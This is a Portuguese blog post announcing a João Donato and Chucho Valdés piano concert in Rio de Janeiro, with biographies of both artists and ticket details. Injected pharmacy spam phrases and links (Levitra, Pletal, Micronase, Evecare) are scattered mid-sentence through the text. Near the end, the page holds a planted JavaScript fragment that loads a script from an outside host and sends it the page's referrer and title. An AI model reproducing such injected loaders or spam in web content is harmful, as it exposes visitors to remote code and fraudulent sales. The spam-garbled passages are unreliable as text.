Jazz/BluesNotíciaProgramaçãoRio de Janeiro

Tirem os móveis da Sala!

levitra 10 acquista on line João Donato e Chucho Valdés juntam os pianos para balançar a Sala Cecília Meireles.

 

O brasileiro João Donato e o cubano Chucho Valdés vão protagonizar um encontro de gigantes do piano latino no dia 29 de março, em duas sessões (17h e 20h) na Sala Cecília Meireles, dentro da série Sala Jazz.

Com muitas afinidades, o trabalho de ambos foi influenciado pela música que o país do outro produz: Donato, com sua sonoridade jazzística e tintas latinas, é muito inspirado pela música de Cuba. Chucho, por sua vez, já afirmou sua predileção pela musica brasileira que, segundo ele, “é a mais rica do mundo”.

Para acompanhar os dois pianistas, foi escalada a competente banda que acompanha Donato há vários anos: Robertinho Silva (bateria), online Buy Luiz Alves (baixo), Ricardo Pontes (sopros) e Frank Colón (percussão).

 

Sobre os artistas

O acreano Order http://truonggiangmocchau.com/pletal-order.htm João Donato de Oliveira Neto é um pianista, acordeonista, arranjador, cantor e compositor brasileiro nascido em 1934. Foi amigo de todos os expoentes do movimento bossa-novista, como João Gilberto, Tom Jobim, Vinícius de Moraes e Johnny Alf, entre outros, mas nunca foi caracterizado unicamente como tal, e sim um músico muito criativo e que promove fusões musicais, de jazz e música latina, entre tantos outros estilos.

Na década de 1950, Donato se mudou para os Estados Unidos, onde permaneceu durante 13 anos e realizou o que nunca conseguira no Brasil: reincorporar a musicalidade afrocubana ao jazz. Gravou o disco A Bad Donato micronase online auctions Order e compôs músicas como Amazonas, A Rã e Cadê Jodel. Retornou ao Brasil, reencontrou a música brasileira que estava sendo feita no país, mas não abandonou sua paixão pela fusão entre o jazz e ritmos caribenhos. Nas palavras do crítico musical Tárik de Souza, buy evecare coupon “Durante muito tempo, João Donato foi um mito das internas da MPB. Gênio, desligado, louco, de tudo um pouco”.

Jesús Valdés Rodríguez, mais conhecido como Chucho Valdés, é um pianista, compositor e arranjador cubano nascido em 1941, cuja carreira já dura mais de meio século. Originalmente um integrante da Orquesta Cubana de Música Moderna, fundou, em 1973, o grupo Irakere, uma das mais conhecidas bandas latinas de jazz. Tanto seu pai, Bebo Valdés, como seu filho, Chuchito, são pianistas. Chucho é vencedor de cinco prêmios Grammy e três prêmios Grammy Latinos.

 

SERVIÇO:

João Donato e Chucho Valdés

29 de março, domingo, às 17h e às 20h

Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

Ingressos esgotados

if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.